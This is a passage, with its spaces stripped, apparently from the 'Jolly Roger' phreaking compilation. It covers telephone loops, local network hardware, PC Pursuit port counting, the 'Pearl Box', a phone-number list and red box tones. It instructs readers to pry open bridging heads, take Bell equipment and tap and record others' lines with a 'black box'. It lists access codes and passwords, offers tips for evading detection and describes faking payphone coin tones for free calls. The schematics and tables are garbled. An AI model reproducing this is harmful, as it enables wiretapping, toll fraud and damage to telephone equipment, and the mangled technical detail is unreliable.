thatthecircuitisoverloaded,orsomethingalongthoselines.Thisisbecause MaBellhastakenthecheckingequipmentofftheline.However,therearestill manyrarelyusedloopswhichcanbeverifiedandcanhaveemergencycallstaken onthem.Asyouhavefoundout,loopscomeinmanytypes.Anothertypeofloop

isafilteredloop.Thesearelooplinesthatthetelcohasputafilteron, sothatnormalhumanvoicescannotbeheardoneitherline.However,other frequenciesmaybeheard.Italldependsonwhatthetelcowantstheloopto beusedfor.Ifaloophasgottentobeverypopularwiththelocalpopulation orusedfrequentlyforconferences,etc.thetelcomayfilterthelooptostop theunwanted"traffic".Usually,thefilterwillberemovedafterafewmonths, though. 94.HowMaBellWorksbyTheJollyRoger Inthisarticle,Iwillfirstdescribethetermination,wiring,andterminal hardwaremostcommonlyusedintheBellsystem,andIwillincludesectionon methodsofusingthem. LOCALNETWORK Thelocaltelephonenetworkbetweenthecentraloffice/exchangeandthe telephonesubscriberscanbebrieflydescribedasfollows: Fromthecentraloffice(orlocalexchange)ofacertainprefix(es),underground areatrunksgotoeachareathathasthatprefix(Usuallymorethanoneprefix perarea.)Ateveryfewstreetsortractareas,theundergroundcablessurface. Theythengotothetelephonepole(orbackunderground,dependingonthe area)andthentothesubscribershouse(orinthecaseofanapartmentbuilding ormutlilinebusiness,toasplitterordistributionbox/panel).Nowthatwe havethebasics,I'lltryandgoindepthonthesubject. UNDERGROUNDCABLES Thesearesometimesinterofficetrunks,butusuallyinaresidentialareathey aretrunklinesthatgotobridgingheadsordistributioncases.Thecablesare about23inchesthick(varies),andareeitherinametalorpvctypepipe(or similar).Rarely(maybenotinsomeremoteruralareas)arethecablesjust 'alone'intheground.Insteadtheyareusuallyinanundergroundcementtunnel (resemblesasmallsewerorstormdrain.)Themanholesareheavyandwillsay 'Bellsystem'onthem.Theycanbeopenedwithainchwidecrowbar(Hookside) insertedinthetoprectangularhole.Thereareladderrungstohelpyouclimb down.Youwillseethecablepipesonthewall,withtheblueandwhitestriped onebeingtheinterofficetrunk(atleastinmyarea).Theothersarelocal lines,andareusuallymarkedorcolorcoded.Thereisalmostalwaysaposted colorcodechartonthewall,nottomentionTelcomanualsdescribingthecables andterminals,soIneednotgetintodetail.Also,thereisusuallysomekind oftestequipment,andoftenBelltestsetsareleftinthere. BRIDGINGHEADS Theinnocentlookinggrayishgreenboxes.Thesecanbeeithertrunkbridgesor bridgingforresidences.Themajortrunkbridgingheadsareusuallylarger,and theyhavethe'WesternElectric'logoatthebottom,whereasthenormalbridging heads(whichmaybedifferentinsomeareasdependingonthecompanyyouare servedby.GTEB.H.'slookslightlydifferent.Also,donotbefooledby sprinklerboxes!)Theycanbefoundinjustabouteverycity.Toopenabridging head:ifitislocked(andyou'refeelingdestructive),putahammerorcrowbar (thesameoneyouusedonthemanhole)intheslotabovethetophingeofthe rightdoor.Pullhard,andthedoorwillripoff.Veryeffective!Ifitisn't locked(asusual),takea7/8inchhexsocketandwithit,turntheboltabout 1/8ofaturntotheright(youshouldhearaspringreleaseinside).Holding thebolt,turnthehandleallthewaytotheleftandpullout.ToCheckfora testset(whichareoftenleftbyBellemployees),goinsideFirstcheckfora testset(whichareoftenleftbyBellemployees).Thereshouldbeapanelof terminalsandwires.Pushthepanelbackaboutaninchorso,androtatethetop latch(roundwithaflatsection)downward.Releasethepanelanditwillfall allthewayforward.Thereisusuallyalargeamountofwireandextra terminals.Thetestsetsareoftenhiddenhere,sodon'toverlookit(Manuals,

aswell,aresometimesplacedinthehead).Ontherightdoorisametalboxof alligatorclips.Takeafew(ComplimentsofBell.).Oneachdoorisauseful littleroundmetaldevice.(Says'insertgently'or'clampgentlydonot overtighten'etc..)Onthefrontofthedisc,youshouldfindtwoterminals. Theseareforyourtestset.(Ifyoudon'thaveone,dontdespairI'llshow youwaystomakebasictestsetslaterinthisarticle).Hookthering()wire tothe'r'terminal;andthetip(+)wiretotheother.(Bytheway,aneasyway todeterminethecorrectpolarityiswitha1vLED.Tapittotheterm.pair, ifitdoesn'tlight,switchthepolesuntilitdoes.Whenitlights,findthe longerofthetwoLEDpoles:Thisonewillbeonthetipwire(+).Behindthe discisacoiledupcord.Thisshouldhavetwoalligatorclipsonit..Itsvery useful,becauseyoudon'thavetokeepconnectinganddisconnectingthefone (testset)itself,andtheclipsworknicely.Ontheterminalboard,there shouldbeabout10screwterminalsperside.Followthewires,andyoucansee whichcablepairsareactive.Hooktheclipstotheterminalpair,andyou're set!Dialoutifyouwant,orjustlisten(Ifsomeone'sontheline).Later, I'llshowyouawaytosetupatrue'tap'thatwillletthepersondialouton hislineandreceivecallsasnormal,andyoucanlisteninthewholetime.More aboutthislater...Onmajorprefixareabridgingheads,youcansee'local loops',whicharetwocablepairs(cablepair=ring+tip,afoneline)thatare directlyconnectedtoeachotherontheterminalboard.These'cheaploops'as theyarecalled,donotworknearlyaswellastheexistingonessetupinthe switchinghardwareattheexchangeoffice.(Tryscanningyourprefixes00xxto 99xx#'s.)Thetonesideswillannouncethemselveswiththe1008hzlooptone, andthehangsidewillgivenoresponse.Thefirstpersonshoulddialthe'hang' side,andtheotherpersondialthetoneside,andthetoneshouldstopifyou havegottherightloop.)Ifyouwanttofindthenumberofthelinethatyou're on,youcaneithertrytodecipherthe'bridginglog'(orwhatever),whichison theleftdoor.Ifthatdoesn'twork,youcanusethefollowing: ANI#(AutomaticNumberID) ThisisaTelcotestnumberthatreportstoyouthenumberthatyou'recalling from(It'sthesame,choppy'Bellbitch'voicethatyougetwhenyoureacha disconnectednumber) Forthe: 213NPADial1223 408NPADial760 914NPADial990 Theseareextremelyusefulwhenmessingwithanykindoflineterminals,house boxes,etc.Nowthatwehavebridgingheadswired,wecangoon...(don'tforget tocloseandlatchtheboxafterall...Wouldn'twantGEandTelcopeoplemad, now,wouldwe?) "CANS"TelephoneDistributionBoxes Basically,twotypes: 1. Large,rectangularsilverboxattheendofeachstreet. 2. Black,round,orrectangularthingateverytelephonepole. Type1Thisisthecasethattakestheundergroundcablefromthebridgeand runsittothetelephonepolecable(Thelowest,largestoneonthetelephone pole.)Theboxisalwaysonthepolenearestthebridginghead,wheretheline comesup.Lookforthe'CallbeforeyouDigUndergroundcable'stickers..The caseboxishinged,soifyouwanttoclimbthepole,youcanopenitwithno problems.Theseusuallyhave2rowsofterminalsets.Youcouldtryto impersonateaTelcotechnicianandreportthenumberas'newactive'(givinga fakenameandfakereport,etc.)Idon'trecommendthis,anditprobablywon't (almostpositivelywon't)work,butthisisbasicallywhatTelcolinemendo.) Type2Thisisthesplitterboxforthegroupofhousesaroundthepole (Usually4or5houses).UseitlikeImentionedbefore.Theterminals(8or

so)willbein2horizontalrowsofsets.Theextrawiresthatarejust'hanging there'areprovisionsforextralinestoresidences(1extralineperhouse, that'swhytheinsanechargeforline#3!)Ifitstheboxforyourhousealso, havefunandswaplineswithyourneighbor!'Piggyback'themandwreakhavocon theneighborhood(It'seavesdroppingtime...)Again,Idon'trecommendthis,and itsdifficulttodoitcorrectly.Movingrightalong... APARTMENT/BUSINESSMULTILINEDISTRIBUTIONBOXES Foundoutsidethebuilding(mostoftenontherightside,butnotalways...Just followthewirefromthetelephonepole)orinthebasement.Ithasaterminal forallthelinesinthebuilding.Useitjustlikeanyotherterminationboxas before.Usuallysays'Bellsystem'orsimilar.Hasupto20terminalsonit (usually.)themiddleonesaregrounds(forgetthese).Thewirescomefromthe cabletoonerow(usuallytheleftone),withtheotherrowofterminalsforthe otherrowofterminalsforthebuildingfonewirepairs.Thering()wireis usuallythetopterminalifthesetintherow(1of10ormore),andthetipis intheclamp/screwbelowit.Thiscanbereversed,butthecablepairisalways terminatedoneontopofeachother,notontheonenexttoit.(I'mnotsure whytheotheroneisthere,probablyasaprovisionforextralines)Don'tuse itthough,itisusuallytoclosetotheotherterminals,andinmyexperiences yougetanoisyconnection. Finalnote:Almosteveryapartment,business,hotel,oranywherethereismore than2linesthisterminationlinesthisterminationmethodisused.Ifyoucan masterthistype,youcanbeincontrolofmanythings...Lookaroundinyour areaforabuildingthatusesthistype,andpracticehookinguptotheline, etc.Asanaddedhelp,hereisthebasic'standard'colorcodeformultiline terminals/wiring/etc... Singleline:Red=Ring Green=Tip Yellow=Ground* *Connectedtotheringercoilinindividualandbridgedringerphones(Bell only)Usuallyconnectedtothegreen(Tip) Ring()=Red White/RedStripe Brown White/OrangeStripe Black/YellowStripe Tip(+)=Green(Sometimesyellow,seeabove.) White/GreenStripe White/BlueStripe Blue Black/WhiteStripe Ground=Black Yellow RESIDENCETERMINALBOX Small,gray(canbeeitherarubber(PacificTelephone)orhardplastic(AT&T) housingdealthatconnectsthecablepairfromthesplitterbox(Seetype2, above)onthepoletoyourhousewiring.Only2(or4,the2topterminalsare hookedinparallelwiththesameline)terminals,andisveryeasytouse.This canbeusedtoaddmorelinestoyourhouseoraddanexternallineoutsidethe house. TESTSETS Well,nowyoucanconsideryourselfaminorexpertontheterminalsandwiring ofthelocaltelephonenetwork.Nowyoucanapplyittowhateveryouwantto do..Here'sanotherhelpfulitem:

HowtomakeaBasicTestSetandhowtouseittodialout,eavesdrop,or seriouslytapandrecordlineactivity.Thesearethe(usually)orangehandset fonesusedbyTelcotechnicianstotestlines.Tomakeaverysimpleone,take anyBell(orother,butIrecommendagoodBellfonelikeaprincessora trimline.GTEflipfonesworkexcellently,though..)foneandfollowthe instructionsbelow. Note:A'blackbox'typefonemodwillletyoutapintotheirline,andwith theboxo,it'sasifyouweren'tthere.Theycanreceivecallsanddialout, andyoucanbelisteningthewholetime!Veryuseful.Withtheboxoff,youhave anormalfonetestset. Instructions: Abasicblackboxworkswellwithgoodresults.Takethecoveroffthefoneto exposethenetworkbox(Belltypefonesonly).Theterminalshouldhaveagreen wiregoingtoit(orangeordifferentiftouchtonedoesn'tmatter,itsthe samething).DisconnectthewireandconnectittoonepoleofanSPSTswitch. Connectapieceofwiretotheotherpoleoftheswitchandconnectittothe terminal.Nowtakea10kohmwatt10%resistorandputitbetweentheterminal adtheterminal,whichshouldhaveablueandawhitewiregoingtoit (differentfortouchtone).Itshouldlooklikethis: Bluewire ! Whitewire! ! 10kResistor ! ! Greenwire! !! SPST Whatthisdoesineffectiskeepthehookswitch/dialpulseswitch(FtoRR loop)openwhileholdingthelinehighwiththeresistor.Thisgivesthesame voltageeffectasifthefonewas'onhook',whilethe10kohmsholdsthe voltagerightabovethe'offhook'threshold(around22voltsorso,ascompared to1517ornormaloffhook48voltsfornormal'onhook'),givingTestSet Version2. Anotherdesignissimilartothe'Type1'testset(above),buthassomeadded features: From>TipRing[HUNT] 2. C2011,PCP10000,[HUNT] 3. C2011.10,PCP10000,[NONHUNT] Thefirst,isselfexplanatory.Theseconddoesthesamethingasthefirst, onlythatitisslightlyfasterandgivestheusermuchgreaterflexibility. Thethirdisanexampletheflexibility,becausearequestismadetoconnectto thetenth,andonlythetenth,modemontheNJNEW/3port.Bysimplyattempting toconnecttoeverysinglemodeminthe2011chain,wewereabletocountthe numberofmodemsoneachportandcomeupwiththefollowingchartswhichwere extractedonJunethetwentyninthoftheyear1989: RotaryPort DirectAddress Max.Range CityTotal NJNEW/3 2011 .12 56 /12 201301 .4 /24 20122 .4 DCWAS/3 202115 .6 /12 202116 .24 Max.Range CityTotal RotaryPort DirectAddress .8 .4 .8 12

CAOAK/3 4155 /12 /24 41511 46 CAPAL/3 /12

.4 16 415216 .4 415106 415224

/24 CTHAR/3 /12 /24 WASEA/3 /12 /24 NYNYO/3 /12 /24 CALAN/3 /12 /24 TXDAL/3 /12 /24 PAPHI/3 /12 /24 OHCLE/3 /12 /24 CODEN/3 /12 /24 FLMIA/3 /12 /24 ILCHI/3 /12 /24 MIDET/3 /12 /24 MOSLO/3 /12 /24 GAATL/3 /12 /24 CASJO/3 /12 /24 WIMIL/3 /12 /24

202117 NONE NONE 203120 NONE NONE 20617 .4 20619 .22 20621 .4 212315 212316 21228 .4 213412 213413 21323 .4 214117 214118 21422 .4 215112 2155 .22 21522 .8 21620 .4 21621 .18 216120 303114 303115 30321 .22 305120 305121 305122 312410 312411 31224 .4 313214 313216 31324 .6 3145 .4 314421 31420 .4 404113 404114 40422 .4 408111 40821 .26 408110 41420 .4 41421 .16 414120

.16 8 .8 30 .4 .14 .8 .28 .6 .22 .6 26 .4 .4 .18 .6 .18 .4 .8 .28 .6 .18 16 .8 .8 .20 .4 .4 24 .4

/24 NONE NONE CASFA/3 415215 .6 /12 415217 /24 41523 .4 ORPOR/3 50320 .2 8 /12 50321 .6 /24 NONE NONE 22 AZPHO/3 60222 .4 /12 60223 .12 /24 60226 .4 40 MNMIN/3 612120 /12 612121 /24 61222 .4 30 MABOS/3 617311 /12 617313 /24 61726 .8 36 TXHOU/3 713113 /12 713114 .24 /24 71324 .1 CACOL/3 71423 .4 18 /12 7144 .1 /24 71424 .4 40 CASAN/3 714119 /12 714213 /24 714124 .4 28 CASDI/3 714102 (619)/12 714210 /24 714121 40 UTSLC/3 80120 .4 /12 80121 .14 /24 80112 .4 30 FLTAM/3 81320 .4 /12 81321 .1 /24 813124 .4 MOKCI/3 816104 .4 /12 816221 /24 816113 .4 32 CAGLE/3 NONE NONE /12 81821 .18 /24 NONE NONE 34 CASAC/3 9167 .4 /12 91611 .8 /24 91612 .4 NCRTP/3 91920 .4 20 /12 91921 .12 /24 919124

20 .10

20 .4 .14 .4 .20 .8 22 32 42

.4 .12 .4 .14 .4 22 18 20 .12 ?? 16

20 22

.4

NOTE:CASAC/3,CASAC/24wereestimated. PCPursuitModemsStatisticsChart NumberofModems01/29/89 Mnemonic 300 1200 2400 Total NJNEW 12 40 4 56 DCWAS 6 24 16 46 CTHAR 0 8 0 8 WASEA 4 22 4 30 NYNYO 4 14 4 22 CALAN 8 28 4 40 TXDAL 6 22 4 32 PAPHI 6 22 8 36 OHCLE 4 18 4 26 CODEN 4 18 22 44

FLMIA 6 18 4 28 ILCHI 8 28 4 40 MIDET 6 18 6 30 MOSLO 4 8 4 16 GAATL 8 20 4 32 CASJO 4 26 4 34 WIMIL 4 16 4 24 CAOAK 4 8 4 16 APAL 4 8 0 12 CASFA 6 10 4 20 ORPOR 2 6 0 8 AZPHO 4 12 4 20 MNMIN 4 14 4 22 MABOS 4 20 8 32 TXHOU 8 24 10 42 CACOL 4 10 4 18 CASAN 4 12 4 20 CASDI 4 14 4 22 UTSLC 4 14 4 22 FLTAM 4 10 4 18 MOKCI 4 12 4 20 CAGLE 4 18 4 26 CASAC 4 8 4 16 NCRTP 4 12 4 20 Total 166 562 170 898 Average 4.8823529 1629412 5 26.411765 Ithinkthestatisticsbasicallyspeakforthemselves.Iamsuretherewillno doubtbehundredsofpeoplewhowillnotsmileatthenumberofspecifickinds ofportssupported,nottomentionthenumberof'dead'or'down'modemsyou willfindwhenyouverifythetotals.Usually,2%toperhaps10%ofthemodems are'dead'withspecificonesrepeatedlyfailingweekafterweek. HistoryOfThisCollection: Almostayearagoasmallselectedgroupofdevotedindividualsgottogetherto discussproblemswiththePCPursuitNetwork,inthemiddleofourdiscussionsa questionwasaskedastohowthenetworkreallyprocessesourcalls.Thiswas intendedtohelpusassessSETcommandsandothersuchmatters.Whentheaddress hypothesiswasofferedwequicklysetouttoproveit.Itwasprovedinabout3 minuteswiththediscoveryof2011(Firsttrywasxxx1).Thedatahas continuallybeencollectedandanalyzedeversince,butuntilnow,hasnever beenmassreleased. Asmallgroupofteenagehackersdiscoveredseveralinterestingthingsthatcan bedonewiththeseaddressesmanyofwhichwillnotbediscussedhereshort ofmentioningthattheseportsconnectedtoviatheseaddressesarenotlimited toPCPursuiters.Youcan,however,fight"dead"dialoutmodemsincitiesvia theaddressmethod.Deadmodemscanbelocatedinabout10seconds(fasterthan Telenet),andcaneitherbereportedorskippedpastbytheuserconnectingto thenextmodeminthesequenceafterthe"dead"one.(Note:Say2011.3isdead, connectto2011.4andyouwillbepastit.If2011.4isbusy,goto2011.The readershouldnotice2011.3isthesameas2011C.) Themostinterestingvalueoftheseaddressesisthatonecancountthenumber ofportsthatTelenetkeepssosecret(Grin).Whentherewereonly28citiesin operationtherewereanaverageof2.7300baud,9.41200baud,and22400baud modemsineachcity.Somecitieshadaslittleas2modemsonaportandas manyas12.Onlyrecentlyhasthenumberofmodemspercitybeguntojump. HowToUpdateTheCountYourself: AnIDisnotrequiredto"request"oneoftheseports,thusthetallyingcanbe doneanytimeofdaybysimplytypingthenumberatthe@prompt.Hereisan

examplewithfourmodems(NJNEW/24): @20122.1 20122AREFUSEDCOLLECTCONNECTION1980 @20122.2 20122BREFUSEDCOLLECTCONNECTION1980 @20122.3 20122CREFUSEDCOLLECTCONNECTION1980 @20122.4 20122DREFUSEDCOLLECTCONNECTION1980 @20122 20122EILLEGALADDRESS1980 ThereadershouldbeawarethatPCPursuitportsalwaysrespondwith'1980'. Donotconfuseitwith'1900',whicharenotPCPursuitports.Intheabove exampleweknowtherearefourportsbecausetheforthwasthelastexisting portbeforeweencounteredthe'ILLEGALADDRESS.'Thereareseveralwaysto signifythatyouhavegoneonebeyondtheendoftheports: 1. xxxxxxILLEGALADDRESS1980 2. xxxxxxNOTOPERATING1980 3. Therequestfreezes(Note:IssueaBREAKthenDtoaborttheattempt yielding'ATTEMPTABORTED'.) Youshouldbeawarethatmodemswhichareoutoforderinthemiddleofthe sequencecanrespondwith'NOTOPERATING'ormayfreezetherequest.Youshould alsonotethatwhenupdatingtheexistinglist,allyouneedtodoistryto requestthenextmodembeyondtheendasofthelastcheck. FindingNewlyAddedPorts: Manyportshavenotyetbeeninstalled;hence,wedonotyetknowtheaddresses. Newportsmaybefoundbyenteringthefirstthreedigitsoftheareacodeand appending(129,101129,201229,301329,etc.)untilthe'REFUSEDCOLLECT CONNECTION1980'appears.Oncethisisfound,simplylogontotheportaddress withyourIDandR/Vdialsomesillyseriesofdigits,disconnecttheport,then connecttothePCPursuitmnemonicyouthinkitmightbeandR/Vredialthe lastnumber.Ifthenumbersmatch,youfoundit. 98.PearlBoxPlansbyTheJollyRoger ThePearlBox:DefinitionThisisaboxthatmaysubstituteformanyboxes whichproducetonesinhertz.ThePearlBoxwhenoperatedcorrectlycanproduce tonesfrom19999hz.Asyoucansee,2600,1633,1336andothercrucialtones areobviouslyinitssoundspectrum. Materialsyouwillneed: 1. C1,C2:mforufceramicdiskcapacitors 2. Q1.....NPNtransistor(2N2222worksbest) 3. S1.....NormallyopenmomentarySPSTswitch 4. S2.....SPSTtoggleswitch 5. B1.....Standard9Voltbattery 6. R1.....Singleturn,50kpotentiometer 7. R2.....Singleturn,100kpotentiometer 8. R3.....Singleturn,500kpotentiometer 9. R4.....Singleturn,1Megpotentiometer 10. SPKR...Standard8ohmspeaker 11. T1.....Minitransformer(8ohmworksbest) 12. Misc...Wire,solder,solderingiron,PCboardorperfboard,boxtocontain thecompletedunit,batteryclip

InstructionsforbuildingPearlBox: SincetheinstructionareEXTREMELYdifficulttoexplaininwords,youwillbe givenaschematicinstead.Itwillbequitedifficulttofollowbuttryitany way. (SchematicforThePearlBox) ++++ !!\ C1C2\ !!+ +++T1 !\+++ !bc!+ !Q1!+S1 !eS2+!SPKR !!!+ !B1! !!! !++ !R1R2R3R4! /\/\/\/\/\/\/\/\ ++++++ Nowthatyouareprobablythoroughlyconfused,letmeexplainafewminor details.Thepotentiometerareaisriggedsothattheleftpoleisconnectedto thecenterpoleofthepotentiometernexttoit.ThemiddleterminalofT1is connectedtothepieceofwirethatrunsdowntotheendofthebattery. CorrectoperationofThePearlBox: YoumaywanttogetsomedrytransferdecalsatRadioShacktomakethisjoba loteasier.Also,someknobsforthetopsofthepotentiometersmaybeuseful too.Usethedecalstocalibratetheknobs.R1istheknobfortheonesplace, R2isforthetensplace,R3ifforthehundredsplaceandR4isforthe thousandsplace.S1isforproducingtheallthetonesandS2isforpower. 1. Turnonthepowerandadjusttheknobsforthedesiredtone. (Example:For2600hzR1=0:R2=0:R3=6:R4=2) 2. HitthepushbuttonswitchandVIOLA!Youhavethetone.Ifyoudon'thave atonerecheckallconnectionsandschematic. 99.ThePhreakfilebyTheJollyRoger 2022823010UNIV.OFD.C. 2025530229PENTAGONT.A.C. 2026355710CATHOLICUNIV.OFAMERICA 2028930330DEFENSEDATANETWORK 2028930331DEFENSEDATANETWORK 2029652900WATERGATE 2037714930TELEPHONEPIONEERS 2066412381VOICEOFCHESTER 2125261111NEWYORKFEEDLINE 2125574455SEXHOTLINE 2127995017ABCNYFEEDLINE 2129349090DIALANIDIOT 2129762727P.D.A. 2129861660STOCKQUOTES 2135412462STOCKMARKETREPORTS 2135476801NAVYSHIPSINFO 2135766061"" 2136643321NEWSFORTHEBLIND 3013931000""

3016674280LOTTERYINFO 3129391600"" 4042215519NUCLEARCOMMISSION 40824888181STNATIONALBANK 4156422160EARTHQUAKEREPORT 5058836828"" 5124722181"" 5124724263WEIRDRECORDING 5124729833"" 5124729941INSERT25CENTS 5124729941SPECIALRECORDING 5128702345"" 5167941707"" 6197480002LOOPLINE 6197480003"" 7033310057MCI(5DIGITS) 7033346831WASH.POST 7033548723COMPELINC. 7037372051METROPHONE(6DIGITS) 7038350500VALNET(5DIGITS) 7038617000SPRINT(6/8DIGITS) 7038619181SPRINT(6/8DIGITS) 7149744020CA.MAINFRAME 7164751072N.Y.DECSYSTEM 8002220555RESEARCHINSTITUTE 8002233312CITIBANK 8002275576EASTERNAIRLINES 8002480151WHITEHOUSEPRESS 8003211424FLIGHTPLANES 8003233026TELTEC(6GIGITS) 8003234756MOTOROLADITELL 8003237751MCIMAINFRAME 8003254112EAsYLINK 8003256397FYI 8003444000MSGSYSTEM 8003686900SKYLINEORDERLINE 8004249090RONALDREAGAN'SPRESS 8004249096WHITEHOUSESWITCH 8004389428ITTCITYCALLSWITCHING 8005212255AUTONET 8005218400TRAVELNET(8DIGITS) 8005263714RCAMAINFRAME 8005271800TYMNET 8006213026SPECIALOPERATOR 8006213028"" 8006213030"" 8006213035"" 8006311146VOICESTAT 8008212121BELLTELEMARKETING 8008286321XEROX$ 8008589313RECORDAVOICE 8008821061AT&TSTOCKPRICES 9149971277"" 9164452864JERRYBROWN N/A9501000SPRINT N/A9501022MCIEXECUNET N/A9501033USTELEPHONE N/A9501044ALLNET(6DIGITS) N/A9501066LEXITEL N/A9501088SKYLINE(6DIGITS)

PHONE#|DESCRIPTION/CODE 2016432227|CODES:235199,235022AND121270 | 8003254112|WESTERNUNION | 8005471784|CODES:101111,350009AND350008 | 8004249098|TOLLFREEWHITEHS. | 8004249099|DEFENSEHOTLINE | 2029652900|WATERGATE | 8003685693|HOWARDBAKERHOTLINE | 2024567639|REAGANSSECRETARY | 2025456706|PENTAGON | 2026940004|PENTAGONMODEM | 2019323371|REUTERS | 8003252091|PASSWORD:GAMES | 8002281111|AMERICANEXPRESS | 6172588313|AFTERCONNECTPRESSCTRLC | 8003237751|PASSWORD:REGISTER | 8003221415|CODES:266891,411266AND836566(USEDBYSYSOP) Thefollowing800#'shavebeencollectedhowevernocodeshavebeenfoundyet! ifyouhackanypleaseletmeknow... phone#|codes: 8003213344|??????????? 8003233027|??????????? 8003233208|??????????? 8003233209|??????????? 8003257222|??????????? 8003279895|??????????? 8003279136|??????????? 8003431844|??????????? 8005471784|??????????? 8005476754|??????????? 8006548494|??????????? 8006824000|??????????? 8008589000|??????????? 800numberswithcarriers. 8003239007 8003239066 8003239073 8003214600 8005471784 1800numbersofthegovernment. 8003211082:NAVYFINANCECENTER.

8004245201:EXPORTIMPORTBANK. 8005230677:ALCOHOLTOBACCOAND. 8005321556:FEDINFORMATION CNTR11082:NAVYFINANCECENTER. 8004245201:EXPORTIMPORTBANK. 8005230677:ALCOHOLTOBACCOAND. 8005321556:FEDINFORMATIONCNTR. 8003254072:COMBAT&ARMSSERVICE. 8003254095:COMBATSUPPORTBRANCH. 8003254890:ROPDUSARCOMBATARMS. 8004323960:SOCIALSECURITY. 8004265996:PUGETNAVALSHIPYARD. Directoryoftollfreenumbers. 8004323960:SOCIALSECURITY. 8004265996:PUGETNAVALSHIPYARD. Directoryoftollfreenumbers. 3012340100:BALTIMOREELECTRIC. 2024561414:WHITEHOUSE. 2025456706:PENTAGON. 2023431100:EPA. 7148911267:DIALAGEEK. 7148975511:TIMELY. 2135716523:SATANICMESSAGES. 2136647664:DIALASONG. 4058437396:SYNTHACERMUSIC. 2137651000:LISTOFMANYNUMBERS. 5124724263:WIERD. 5124729941:INSERT25. 2037713930:PIONEERS. 2132544914:DIALAATHIEST. 2125860897:DIRTY. 2138403971:HOROWIERD 2037713930:PIONEERS 4719420,3459721,8368962 8363298,3234139,8365698 4719440,4719440,4716952 4766040,3279772,4719480 8003251693,8003254113 8005218400:VOICEACTIVATED 2139928282:METROFONEACCESSNUMBER 6177385051:PIRATEHARBOR 6177203600:TIMECOR#2 3013449156:N.A.S.APASSWORD:GASET 3182336289:UNIVERSITYLOUISIANA 2138222112:2138223356 2138221924:2138223127 2134494040:TECHCENTER 2139373580:TELENET 18008428781 18003685676 18003453878 2123311433 2138927211 2136262400 7132371822 7132246098 7132251053 7132249417 8189928282 18005218400 Afterenteringthesprintcode,and,C+Destinationnumber.Thenenterthis

number:205#977#22",Andthemaintracerforsprintwillbedisabled. 2155613199/SPRINTLONGDISTANCE 2024561414/WHITEHOUSE 0114419304832/QUEENELIZABETH 9164452864/JERRYBROWN 8004249090/RONALDREAGAN'SPRESS 2127995017/ABCNEWYORKFEEDLINE 8008821061/AT&TSTOCKPRICES 2129861660/STOCKQUOTES 2139351111/WIERDEFFECTS! 5124724263/WIERDRECORDING 2129762727/P.D.A. 6197480002/FONECO.TESTINGLINES 9004106272/SPACESHUTTLECOMM. 2012216397/AMERICANTELEPHONE 2154666680/BELLOFPENNSYLVANIA 2023470999/CHESAPEAKETELEPHONE 2138290111/GENERALTELEPHONE 8085334426/HAWAIIANTELEPHONE 3123688000/ILLINOISBELLTELEPHONE 3172658611/INDIANABELL 3132237233/MICHIGANBELL 3132237223/NEVADABELL 2079551111/NEWENGLANDTELEPHONE 2014833800/NEWJERSEYBELL 2123952200/NEWYORKTELEPHONE 5152430890/NORTHWESTERNBELL 2168226980/OHIOBELL 2063452900/PACIFICNORTHWESTBELL 2136214141/PACIFICTELEPHONE 2053212222/SOUTHCENTRALBELL 4043912490/SOUTHERNBELL 2037714920/SOUTHERNNEWENGLAND 3142475511/SOUTHWESTERNBELL 4146783511/WISCONSINTELEPHONE 8003276713/UNKNOWNORIGIN 3032328555/HP3000 3154231313/DEC10 3135770260/WAYNESTATE 5124745011/AUSTINCOMPUTERS 5165678013/LYRICSTIMESHARING 2123695114/RSTS/E 4153275220/NEC 7137951200/SHELLCOMPUTERS 5184718111/CNAOFNY 8003276761/AUTONET 8002281111/VISACREDITCHECK 7134832700/NASUA 2133831115/COSMOS 4082801901/TRW 4048853460/SEARSCREDITCHECK 4142899988/AARDVARKSOFTWARE 9198521482/ANDROMEDAINCORPORATED 2139852922/ARTSCI 7146279887/ASTARINTERNATIONAL 4159648021/AUTOMATEDSIMULATIONS 5033453043/AVANTGARDECREATIONS 4154566424/BRODERBUNDSOFTWARE 4156588141/BUDGECOMPANY 7147555392/CAVALIERCOMPUTER 8017536990/COMPUTERDATASYSTEMS

2137015161/DATASOFTINC. 2133667160/DATAMOST 7164428960/DYNACOMP 2133466783/EDUWARE 8006310856/HAYDEN 9199831990/MEDSYSTEMSSOFTWARE 3124337550/MICROLAB 2064541315/MICROSOFT 3016597212/MUSESOFTWARE 2096836858/ONLINESYSTEMS 2036618799/PROGRAMDESIGN(PDI) 2133446599/QUALITYSOFTWARE 3039259293/SENTIENTSOFTWARE 7026472673/SIERRASOFTWARE 9169201939/SIRIUSSOFTWARE 2153932640/SIRTECH 4159628911/SOFTWAREPUBLISHERS 4159641353/STRATEGICSIMULATIONS 2173598482/SUBLOGICCOM. 2062263216/SYNERGISTICSOFTWARE HereareafewtipsonhownottogetcaughtwhenusingMCIorothersuch services: 1. Trynottousethemforvoicetovoicepersonalcalls.Trytousethemfor computercallsonly.Hereiswhy: MCIandthoseotherservicescan'treallytracethecallsthatcome throughthelines,theycanjustmonitorthem.Theycanlisteninonyourcalls andfromthat,theycangetyournameandotherinformationfromthe conversation.Theycanalsocallthenumberyoucalledandaskyourfriendsome questions.IfyoucallterminalsandBBS'Sthenitismuchhardertoget information.Foronething,mostsysopswon'tgivethesedudesthatcallany infoatallortheywillactdumbbecausetheyPHREAKthemselves! 2. Bewarewhenusingcoloredboxes!Theyareeasytofind!!!!!

3. Trytofindasinewavenumber.ThenuseanMCIorotherservicetocall it.Youwillhearatonethatgoeshigherandlower.Ifthetonejuststops, thenthatcodeisbeingmonitoredandyoushouldbewarewhenusingit. Ifyoudogetcaught,thenifyouthinkyoucan,trytoweaseloutofit.Ihave heardmanystoriesaboutpeoplethathavepleadedwiththeMCIguysandhave beenletoff.Youwillgetacallfromaguythathasbeenmonitoringyou.Act nice.Actlikeyouknowitisnowwrongtodothiskindofthing.....justsound likeyouaresorryforwhatyoudid.(Ifyougetacall,youprobablywillbea littlesorry!)Otherwise,itisverydangerous!!!!!!!(VerywithacapitalV!) 100.RedBoxPlansbyTheJollyRoger Redboxingissimulatingthetonesproducedbypublicpayphoneswhenyoudrop yourmoneyin.Thetonesarebeepsof2200Hz+1700Hzanickleis1beepfor66 milliseconds.Adimeis2beeps,each66millisecondswitha66millisecond pausebetweenbeeps.Aquarteris5beeps,each33millisecondswitha33 millisecondpausebetweenbeeps. TherearetwocommonlyusedmethodsbeingusedbyPhreakstomakefreecalls. 1. AnelectronichandhelddevicethatismadefromapairofWienbridge oscillatorswiththetimingcontrolledby555timingchips. 2. Ataperecordingofthetonesproducedbyahomecomputer.Oneofthebest

